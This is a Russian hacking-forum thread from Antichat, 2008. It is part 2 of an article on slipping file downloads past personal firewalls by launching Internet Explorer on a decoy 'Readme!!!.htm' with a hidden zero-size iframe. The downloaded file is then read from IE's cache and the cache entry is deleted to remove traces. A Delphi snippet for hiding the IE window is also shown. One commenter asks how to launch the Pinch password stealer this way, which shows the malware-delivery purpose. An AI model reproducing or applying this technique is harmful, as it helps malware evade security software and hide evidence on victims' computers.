Хитрый обход файрволов. Часть 2. |
25.04.2008, 19:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Хитрый обход файрволов. Часть 2.
I. Цель продолжения
Сейчас я продолжу говорить о способе обхода фаеров, начатом ТуТ. Как можно было бы заметить, метод, описаный в первой части, не даёт ответа на вопрос "Как скачать что-то из сети?" Я попробую исправить это недоразумение. Минус метода всё тот же – он годится только для обхода ограничений, связанных с сетевой активностью, так как используется создание процесса. В большинстве случаев, процесс незаметно можно создать без возмущений фаера, но в некоторых случаях нужна СИ...
Предупреждение: в статье используется дельфийский код! 
II. "Подправка" идеи из первой части
Запускаем IE, открываем страничку и читаем её содержимое из кэша. Хорошо бы ещё удалить её после этого оттуда по двум причинам:
1) IE иногда криво сохраняет записи в кэш повторно
2) Просто уничтожить следы жизнедеятельности
III. Реализация
Опять, наша цель - файл ".htm". А конкретно в приведённой ниже реализации я использую к тому же и сокрытие окошка IE.
Итак, записываем файл типа “Readme!!!.htm” примерно такого содержания:
PHP код:
<html>
<head>
<!--
для дальнейшего прятания IE заголовок окна важен!!1
-->
<title>
4 t3st purposes
</title>
</head>
<body>тра-та-та, спасибо за установку великого программного продукта и т.п.
<iframe width=”0” height=”0” style=”visibility: hidden” src=”http://server.com/doenload_good_file.php”></iframe>
</body></html>
И, как и в первой части, запускаем файл (“explorer.exe Readme!!!.htm”).
После чего ждём некоторое время, пока IE обновит кэш, и грузим файл из кэша,с последующим его удалением.
На этом идея реализации кончается.
IV. Файлы для статьи.
Тут реализован данный механизм с различными вариантами открытия обозревателя
get.php:
PHP код:
<?
echo "You random is: " . rand();
?>
И основной код, на который, кстати, я, совместно с исследованием структуры файла index.dat, потратил часов 10, пока не узнал, что есть API для работы с ним (работающие, правда, также не безупречно как и результат моих страданий см. пункт II.)
Сорцы «клиента» и откомпиленный экземпляр (Delphi! Кстати, интересно будет посмотреть тем, кто хочет разобраться с IE-кэшем)
Особых пояснений не даю, дабы такой способ не получил особенно широкого распространения.
V. Заключение
Всё
Re всем, кто меня знает, помнит и т.п.
©73ru5 aka desTiny, 2008.
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
Последний раз редактировалось desTiny; 26.04.2008 в 20:52..
|
|
|
26.04.2008, 20:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Небольшое исправление: в коде вместо
t := FindWindow(nil, '4 t3st purposes - Microsoft Internet Explorer');
сильно лучше, зоть и не обязательно, использовать
t := FindWindow(nil, title +' - Microsoft Internet Explorer');
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
27.05.2008, 18:57
|
|
Banned
Регистрация: 09.05.2008
Сообщений: 160
С нами:
9477026
Репутация:
500
|
|
Вот именно,и я не поняла))))
|
|
|
|
27.05.2008, 20:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
Сообщение от Zedo83
нихрена не понял =)
как пинча пустить через IE или Firefox ?)
Сообщение от Bloodmoon
Вот именно,и я не поняла))))
Вот я и старался, чтобы поняли не все 
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
28.05.2008, 00:07
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 904
С нами:
9655526
Репутация:
1821
|
|
Сообщение от desTiny
Вот я и старался, чтобы поняли не все Это есть зашита от гостей! 
Статья полезная
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
